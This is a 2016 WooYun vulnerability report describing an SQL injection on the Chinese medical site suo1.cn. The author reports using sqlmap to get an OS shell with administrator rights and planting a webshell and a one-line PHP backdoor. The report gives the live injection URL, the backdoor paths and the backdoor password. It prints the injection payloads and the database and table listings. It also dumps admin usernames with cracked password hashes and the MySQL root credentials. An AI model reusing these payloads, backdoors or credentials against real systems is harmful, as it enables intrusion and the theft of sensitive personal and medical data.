当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0183372

漏洞标题:索医网某处漏洞(root权限\Getshell\提权服务器)涉及上百万敏感信息(包括简历/医院报告等等)

相关厂商:索医网

漏洞作者: 路人甲

提交时间:2016-03-11 17:13

修复时间:2016-04-25 17:13

公开时间:2016-04-25 17:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

求上个首页。。。

详细说明:

索医网某处存在注入漏洞,直接是root 权限,直接sqlmap --os-shell 拿下shell 写入一句话,发现是超级管理员权限,直接可以添加用户,另外3389 是可以直接连接的,泄露10个医药网网站,上面存在大量网站信息、、、足足有上百万敏感信息、、、太多数据了 服务器就登陆上去了 点到为止、、、
注入点:http://www.suo1.cn/site/list.php?id=41 root权限 直接 --os-shell
shell地址:http://www.suo1.cn/inc/tmpukzmf.php
一句话:http://www.suo1.cn/inc/1.php 密码:w
D:\webphp\gl.suo1.cn\inc\> whoami
windows-vdiq430\administrator

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=41) AND 5905=5905 AND (4726=4726
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=41) AND (SELECT 6578 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(6578=6578,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1492=1492
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=41) AND (SELECT * FROM (SELECT(SLEEP(5)))volC) AND (3818=3818
    Type: UNION query
    Title: MySQL UNION query (NULL) - 30 columns
    Payload: id=41) UNION ALL SELECT CONCAT
(0x7162786a71,0x475a426a424e59626656,0x7176627871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[15:32:54] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.10, PHP 5.4.33
back-end DBMS: MySQL 5.0
available databases [15]:
[*] cs_suo1_cn
[*] hlyj_suo1_cn
[*] hlyje_suo1_cn
[*] information_schema
[*] mysql
[*] performance_schema
[*] qkhl1_suo1_cn
[*] suo1_site
[*] sxhl_org
[*] test
[*] w_site
[*] wanfang
[*] xzhl_suo1_cn
[*] zhuren
[*] zxy_suo1_cn
Database: suo1_site
[17 tables]
+--------------+
| ad_list      |
| hlyje_bw     |
| maga_columns |
| maga_lm      |
| maga_nr      |
| maga_series  |
| s_user       |
| s_wsite      |
| wsite_about  |
| wsite_menu   |
| wsite_mx     |
| wsite_mx_kz  |
| wsite_news   |
| wsite_qk     |
| wsite_qknr   |
| wsite_temp   |
| wx_hongbao   |
+--------------+
Database: suo1_site
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| wsite_qknr   | 230824  |
| maga_nr      | 46233   |
| maga_columns | 6376    |
| wsite_news   | 1912    |
| maga_series  | 713     |
| maga_lm      | 176     |
| wx_hongbao   | 117     |
| wsite_menu   | 71      |
| wsite_about  | 30      |
| wsite_qk     | 30      |
| s_user       | 15      |
| hlyje_bw     | 13      |
| wsite_temp   | 12      |
| wsite_mx_kz  | 10      |
| s_wsite      | 7       |
| wsite_mx     | 2       |
| ad_list      | 1       |
+--------------+---------+
Database: suo1_site
Table: s_user
[7 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| Id         | int(11)      |
| jx_qx      | varchar(255) |
| qx         | varchar(255) |
| s_email    | varchar(255) |
| s_password | varchar(255) |
| s_username | varchar(255) |
| site_id    | int(11)      |
+------------+--------------+
Database: suo1_site
Table: s_user
[15 entries]
+------------+-------------------------------------------+
| s_username | s_password                                |
+------------+-------------------------------------------+
| admin      | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| wyh        | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| hlyj       | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| zxy        | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| qkhl       | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| hlyje      | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| xzhl       | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| hlyjee     | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| admin1     | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| admin2     | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| admin3     | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| changdayu  | e10adc3949ba59abbe56e057f20f883e (123456) |
| peifang    | e10adc3949ba59abbe56e057f20f883e (123456) |
| lixiaoyan  | e10adc3949ba59abbe56e057f20f883e (123456) |
| yujiayu    | e10adc3949ba59abbe56e057f20f883e (123456) |
+------------+-------------------------------------------+
database management system users password hashes:                              
[*] root [2]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B   root
    clear-text password: root
    password hash: *AECE71641589CFE947A37D283624CEF55A02C3FE
[*] test [1]:
    password hash: *A3629E3861C4C6F5C852E0FB3DA01524963E218E
[*] wf [1]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    clear-text password: 123456
[*] zhuren [1]:
    password hash: *FBD85F710780DBDB507D7EC4F64F9E6E58AB00FE


1.jpg


2.png


3.png


4.png


8.png


漏洞证明:

直接可以跑出各种数据,服务器上面一共有10个医药网站,数据量巨大啊、、、就不一一弄出来了。

Database: cs_suo1_cn
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| g_log           | 303067  |
| g_sh            | 155230  |
| g_manuscript    | 151804  |
| g_file          | 120787  |
| s_user_authors  | 109181  |
| login_log       | 82075   |
| c_email_log     | 57823   |
| c_sms_log       | 11079   |
| g_bb_w_fb       | 7882    |
| g_jl            | 5507    |
| g_cw            | 3722    |
| s_getbook_xq    | 3013    |
| s_getbook       | 2744    |
| g_bb_d_user     | 383     |
| g_manuscript_cg | 303     |
| g_bb_m_user     | 252     |
| g_bb_w          | 151     |
| s_zz_qj         | 124     |
| s_permission    | 55      |
| s_user          | 55      |
| s_zz_yjfx       | 35      |
| u_role_qh       | 30      |
| s_flow          | 28      |
| s_user_quickhf  | 28      |
| s_zz_lm         | 20      |
| s_zc            | 17      |
| s_role          | 15      |
| s_gjzt          | 11      |
| s_xl            | 11      |
| s_zz            | 11      |
| c_email         | 10      |
| c_sms           | 9       |
| g_jdlx          | 6       |
| s_yjfx          | 6       |
| s_zz_tgyj       | 3       |
| g_pdfjyg        | 2       |
| g_pdfjyg_cg     | 2       |
| g_bb_m          | 1       |
| g_magazine      | 1       |
| s_jjr           | 1       |
+-----------------+---------+
Database: hlyj_suo1_cn
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| g_log           | 341829  |
| g_sh            | 163262  |
| g_manuscript    | 157563  |
| login_log       | 127961  |
| g_file          | 127167  |
| s_user_authors  | 112475  |
| c_email_log     | 70165   |
| c_sms_log       | 23955   |
| g_bb_w_fb       | 7882    |
| g_jl            | 6466    |
| g_cw            | 4311    |
| s_getbook_xq    | 3484    |
| s_getbook       | 3172    |
| pay_zf_log      | 1371    |
| g_manuscript_cg | 404     |
| g_bb_d_user     | 383     |
| g_bb_m_user     | 252     |
| g_bb_w          | 151     |
| s_zz_qj         | 139     |
| s_user          | 98      |
| s_permission    | 58      |
| s_zz_yjfx       | 35      |
| u_role_qh       | 30      |
| s_flow          | 28      |
| s_user_quickhf  | 28      |
| s_zz_lm         | 20      |
| s_zc            | 17      |
| s_role          | 15      |
| c_sms           | 12      |
| s_gjzt          | 11      |
| s_xl            | 11      |
| s_zz            | 11      |
| c_email         | 10      |
| pay_zf          | 9       |
| g_jdlx          | 6       |
| s_yjfx          | 6       |
| s_zz_tgyj       | 3       |
| g_pdfjyg        | 2       |
| g_pdfjyg_cg     | 2       |
| g_bb_m          | 1       |
| g_magazine      | 1       |
| s_jjr           | 1       |
+-----------------+---------+
Database: xzhl_suo1_cn
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| g_log             | 4611    |
| login_log         | 3119    |
| c_email_log       | 1864    |
| g_file            | 827     |
| g_manuscript      | 805     |
| s_user_authors    | 788     |
| g_sh              | 783     |
| c_sms_log         | 466     |
| s_user            | 67      |
| s_permission      | 52      |
| g_cw              | 51      |
| s_permission_bak1 | 48      |
| s_getbook_xq      | 44      |
| s_getbook         | 43      |
| g_jl              | 42      |
| u_role_qh         | 42      |
| site_news_class   | 33      |
| s_flow            | 31      |
| s_flow_bak1       | 27      |
| s_zz_lm           | 23      |
| s_zc              | 17      |
| s_role            | 16      |
| c_sms             | 12      |
| site_info         | 12      |
| s_gjzt            | 11      |
| s_xl              | 11      |
| s_zz              | 11      |
| c_email           | 10      |
| s_zz_yjfx         | 10      |
| s_zz_qj           | 8       |
| g_jdlx            | 6       |
| g_manuscript_cg   | 6       |
| s_yjfx            | 6       |
| s_user_quickhf    | 3       |
| s_zz_tgyj         | 3       |
| g_magazine        | 1       |
| site_user         | 1       |
+-------------------+---------+


6.png


7.png


9.png


12.jpg


修复方案:

修复吧。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)